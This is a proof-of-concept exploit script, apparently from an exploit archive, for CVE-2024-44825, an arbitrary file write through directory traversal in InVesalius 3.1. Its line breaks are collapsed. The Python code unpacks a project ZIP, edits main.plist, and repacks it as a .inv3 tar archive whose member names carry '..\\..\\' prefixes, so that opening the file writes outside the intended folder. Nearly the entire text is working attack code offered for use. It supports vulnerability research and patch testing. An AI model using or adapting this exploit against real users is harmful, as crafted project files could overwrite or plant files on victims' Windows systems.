Invesalius 3.1 Arbitrary File Write / Directory Traversal

# Exploit Title: Invesalius 3.1 - Arbitrary File Write using Directory Traversal # Discovered By: Riccardo Degli Esposti (partywave)# Exploit Author: Riccardo Degli Esposti (partywave)# Vendor Homepage: https://invesalius.github.io/# Software Link: https://github.com/invesalius/invesalius3/tree/master/invesalius# Version: from 3.1.99995# Tested on: Windows# CVE-ID: CVE-2024-44825import tarfileimport osimport zipfile# Disclaimer:# Tested on Windows# edit every [CHANGEME] before run this script# Step 0: Setup local paths# Adapt your pathszip_file_path = 'C:\\users\\[CHANGEME]\\downloads\\[CHANGEME].zip'extracted_folder = 'C:\\users\\[CHANGEME]\\downloads\\[CHANGEME]'output_tar = 'C:\\users\\[CHANGEME]\\downloads\\local-output.inv3'main_plist_path = os.path.join(extracted_folder, 'main.plist')# Ensure the extraction directory existsos.makedirs(extracted_folder, exist_ok=True)# Step 1: Extract the ZIP filewith zipfile.ZipFile(zip_file_path, 'r') as zip_ref:    zip_ref.extractall(extracted_folder)with open(main_plist_path, 'r') as file:    main_plist_content = file.read()# POC of loading new XMLmain_plist_content = main_plist_content.replace(    '<string>ProMED CT 0051</string>',     '<string>This is a confirmation modifying the XML</string>')with open(main_plist_path, 'w') as file:    file.write(main_plist_content)# Step 3: Create the tar archive# Adapt where you want writedef rename(tarinfo):    tarinfo.name = "..\\..\\[CHANGEME]\\" + tarinfo.name    return tarinfowith tarfile.open(output_tar, "w:xz") as tar:    for root, _, files in os.walk(extracted_folder):        for file in files:            full_path = os.path.join(root, file)            arcname = os.path.relpath(full_path, extracted_folder)            tar.add(full_path, arcname=arcname, filter=rename)output_tar